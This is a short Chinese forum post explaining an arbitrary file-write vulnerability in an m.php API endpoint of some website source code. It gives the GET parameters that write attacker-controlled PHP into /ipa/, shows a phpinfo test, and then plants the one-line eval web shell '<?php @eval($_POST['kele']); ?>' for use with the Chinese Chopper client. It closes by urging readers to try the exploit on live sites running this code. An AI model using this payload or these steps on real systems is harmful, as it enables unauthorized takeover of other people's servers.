话不多说,先讲一下这个漏洞
其实就是一个文件写入漏洞,我利用了这个漏洞写入了后门,就是这个API接口的漏洞
这源码里面的m.php文件可以任意写入文件
可以看到msb是文件名,msg这些参数是写入文件里面的,
使用get类型提交m.php?msb=kele&msg=测试,然后提交就会在/ipa/目录下多了个kele.php的文件,里面也有测试两个字
那么我把他换成<?php phpinfo();?>呢
然后再打开/ipa/kele.php文件
可以看到已经执行了php代码,然后在换成后门代码
<?php @eval($_POST['kele']); ?>
然后在用菜刀连接就好了[滑稽]
这就是个任意文件写入漏洞,看到这个源码搭建的站可以试试利用这个漏洞